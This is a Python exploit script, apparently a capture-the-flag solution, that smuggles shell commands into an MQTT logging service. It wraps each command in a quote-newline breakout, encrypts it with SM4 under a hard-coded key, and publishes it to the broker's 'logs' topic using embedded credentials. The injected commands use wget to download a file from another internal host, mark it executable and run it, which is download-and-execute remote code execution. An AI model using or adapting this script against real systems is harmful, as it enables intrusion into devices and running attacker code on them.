import time
import struct
import base64
import paho.mqtt.client as mqtt
from gmssl.sm4 import CryptSM4, SM4_ENCRYPT, SM4_DECRYPT
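def on_connect(client, userdata, flags, rc):
    """paho-mqtt (callback API v1) connect callback: report the broker's answer.

    Args:
        client: the paho client instance (unused here).
        userdata: user data attached to the client (unused here).
        flags: connect response flags from the broker (unused here).
        rc: connection result code; 0 means the broker accepted the
            connection, anything else is a refusal code.

    Prints a single line either way and returns None.
    """
    if rc == 0:
        print("Connected to MQTT Broker!")
    else:
        # The original passed rc as a second positional argument to print(),
        # so "%d" was never substituted and the literal "%d" was printed;
        # format the code into the message instead.
        print("Failed to connect, return code %d\n" % rc)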
def pack_key(v24):
    """Serialize the first four 32-bit words of *v24* as little-endian bytes.

    Args:
        v24: an indexable sequence of at least four unsigned 32-bit integers.
            Only indices 0..3 are used; extra entries are ignored.

    Returns:
        16 bytes: each word packed with struct format '<I', in order.
    """
    # Same as four consecutive '<I' packs concatenated; the explicit indices
    # keep the original's IndexError for a sequence shorter than four words.
    return b''.join(struct.pack('<I', v24[idx]) for idx in range(4))
def encode_sm4(value, key):
    """SM4-encrypt *value* with *key* in ECB mode via gmssl's CryptSM4.

    Args:
        value: bytes to encrypt (the caller does its own framing; whatever
            block padding crypt_ecb applies is gmssl's, not visible here).
        key: SM4 key bytes as accepted by CryptSM4.set_key.

    Returns:
        The ciphertext bytes returned by crypt_ecb.

    NOTE(review): ECB uses no IV, so the same plaintext under the same key
    always yields the same ciphertext; the output is fully deterministic.
    """
    cipher = CryptSM4()
    cipher.set_key(key, SM4_ENCRYPT)
    return cipher.crypt_ecb(value)
def decode_sm4(value, key):
    """SM4-decrypt *value* with *key* in ECB mode via gmssl's CryptSM4.

    Args:
        value: ciphertext bytes produced by encode_sm4 (or any SM4-ECB output).
        key: SM4 key bytes as accepted by CryptSM4.set_key.

    Returns:
        The plaintext bytes returned by crypt_ecb in decrypt mode (any
        padding removal is gmssl's behaviour, not visible here).
    """
    cipher = CryptSM4()
    cipher.set_key(key, SM4_DECRYPT)
    return cipher.crypt_ecb(value)
def get_input(command):
    """Build the base64 blob that the script places in the JSON "info" field.

    Steps, unchanged from the original:
      1. pack the four key words embedded below into the 16-byte SM4 key;
      2. frame *command* as b'"\\n' + command + b'\\n' and right-pad with
         b"a" up to 0x20 bytes (ljust only pads, it never truncates);
      3. SM4-ECB encrypt and refuse a ciphertext longer than 0x30 bytes;
      4. prefix a single 0xbf marker byte and base64-encode.

    Args:
        command: the command bytes to frame.

    Returns:
        The base64 bytes.

    Both length checks print the offending length and then call exit(0),
    i.e. the process ends with a success status even on rejection.
    """
    # Key material is hard-coded in the script, so it is the same for every run.
    sm4_key = pack_key([0x9845DC01, 0x10CD5489, 0x67BA23FE, 0xEF32AB76])

    framed = (b'"\n' + command + b'\n').ljust(0x20, b"a")

    ciphertext = encode_sm4(framed, sm4_key)
    if len(ciphertext) > 0x30:
        print("len_sm4_encode:" + str(len(ciphertext)))
        print("[+]erro:encode_sm4_string is too long!")
        exit(0)

    encoded = base64.b64encode(b"\xbf" + ciphertext)
    # base64.b64encode always returns a multiple of four bytes, so this
    # branch cannot fire; it is kept only to match the original exactly.
    if len(encoded) & 3:
        print("len_input:" + str(len(encoded)))
        print("[+]erro:input len & 3 != 0")
        exit(0)

    return encoded
if __name__ == "__main__":
    # Three command payloads, wrapped independently and published in order.
    cmd1 = b'wget http://192.168.1.219:9/z'
    cmd2 = b'chmod +x /z'
    cmd3 = b'/z'

    input1, input2, input3 = (
        get_input(raw).decode() for raw in (cmd1, cmd2, cmd3)
    )
    print("[+]input1:" + input1)
    print("[+]input2:" + input2)
    print("[+]input3:" + input3)

    # Each message is a JSON object with a fixed timestamp and the base64
    # blob in "info"; the template yields byte-identical text to the
    # original string concatenation (the base64 text contains no '%').
    message = '{"log":1,"timestamp":"11-11-11:11:11","info":"%s"}'
    p1 = message % input1
    p2 = message % input2
    p3 = message % input3
    print(p1)
    print(p2)
    print(p3)

    # Broker login and address are literal strings in the script, and no
    # tls_set() call is made, so the credentials and every payload travel
    # over plain MQTT on port 8888. Each publish goes to topic "logs".
    client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
    client.username_pw_set(username="xhlj2024", password="2758934")
    client.on_connect = on_connect
    client.connect("192.168.1.1", 8888)

    topic = "logs"
    for payload in (p1, p2, p3):
        client.publish(topic, payload)
        time.sleep(2)
    client.disconnect()